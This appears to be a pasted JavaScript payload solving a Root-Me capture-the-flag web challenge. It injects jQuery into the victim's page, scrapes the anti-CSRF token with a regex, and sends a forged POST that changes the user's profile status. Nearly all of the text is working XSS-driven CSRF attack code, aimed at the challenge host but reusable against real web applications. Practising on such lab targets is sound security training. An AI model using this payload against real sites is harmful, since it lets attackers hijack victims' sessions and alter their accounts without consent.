Untitled

// Load JQuery dynamically in the targeted context
var headx = document.getElementsByTagName('head')[0];
var jq = document.createElement('script');
jq.type = 'text/javascript';
jq.src = 'http://code.jquery.com/jquery-latest.min.js';
headx.appendChild(jq);

// Function with JQuery AJAX request
// This function requests an internal WebGUI page, which contains the token.
// Source code of this webpage is passed to the extractToken() function.
function loadToken(){
$.ajax({
type: 'POST',
url: 'http://challenge01.root-me.org/web-client/ch23/?action=profile',
contentType: 'application/x-www-form-urlencoded;charset=utf-8',
dataType: 'text',
data: '',
success:extractToken
}); // after this request, we called the extractToken() function to extract the token
}

// Function called after AJAX request in a defined page of the context, which contains the token value
function extractToken(response){
// response var contain the source code of the page requested by AJAX
// Regex to catch the token value
var regex = new RegExp("<input type='hidden' name='token' value='(.*)' />",'gi');
var token = response.match(regex);
token = RegExp.$1;
// Pass the token to the final function which make the CSRF final attack
makeCSRF(token);
}

// This function use JQuery AJAX object.
// The token var is needed to perform the right CSRF attack with the context referer
function makeCSRF(token){
// Final CSRF attack with right referer (because executed in the context)
// and with right token captured above
$.ajax({
type: 'POST',
url: 'http://challenge01.root-me.org/web-client/ch23/?action=profile',
contentType: 'application/x-www-form-urlencoded;charset=utf-8',
dataType: 'text',
data: 'submit=Submit&username=lol&status=checked&token=' + token
}); // payload of your choice
}

// Waiting 2 secondes for correct loading of JQuery added dynamically.
// Then, run the first AJAX request in the WebGUI context to retrieve the token
setTimeout('loadToken()', 2000);